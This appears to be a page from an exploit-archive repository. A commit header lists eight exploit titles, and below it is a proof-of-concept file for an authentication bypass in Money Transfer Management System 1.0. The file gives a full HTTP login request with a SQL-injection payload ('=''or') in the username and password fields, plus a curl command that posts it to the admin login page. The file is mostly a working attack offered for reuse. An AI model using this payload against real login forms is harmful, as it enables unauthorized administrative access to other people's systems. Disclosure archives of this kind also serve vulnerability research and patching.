d8eefee2c7
8 changes to exploits/shellcodes zlog 1.2.15 - Buffer Overflow Simple Client Management System 1.0 - SQLi (Authentication Bypass) Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated) Money Transfer Management System 1.0 - Authentication Bypass Froxlor 0.10.29.1 - SQL Injection (Authenticated) WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)
28 lines
No EOL
1 KiB
Text
28 lines
No EOL
1 KiB
Text
# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass
|
|
# Date: 2021-11-07
|
|
# Exploit Author: Aryan Chehreghani
|
|
# Vendor Homepage: https://www.sourcecodester.com
|
|
# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html
|
|
# Version: 1.0
|
|
# Tested on: Windows 10
|
|
# Admin panel authentication bypass
|
|
|
|
Admin panel authentication can be bypassed due to a SQL injection in the login form:
|
|
|
|
Request:
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-Requested-With: XMLHttpRequest
|
|
Referer: http://localhost/mtms/admin/login.php
|
|
Content-Length: 37
|
|
Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3
|
|
Connection: keep-alive
|
|
|
|
username='=''or'&password='=''or'
|
|
|
|
PoC:
|
|
curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php |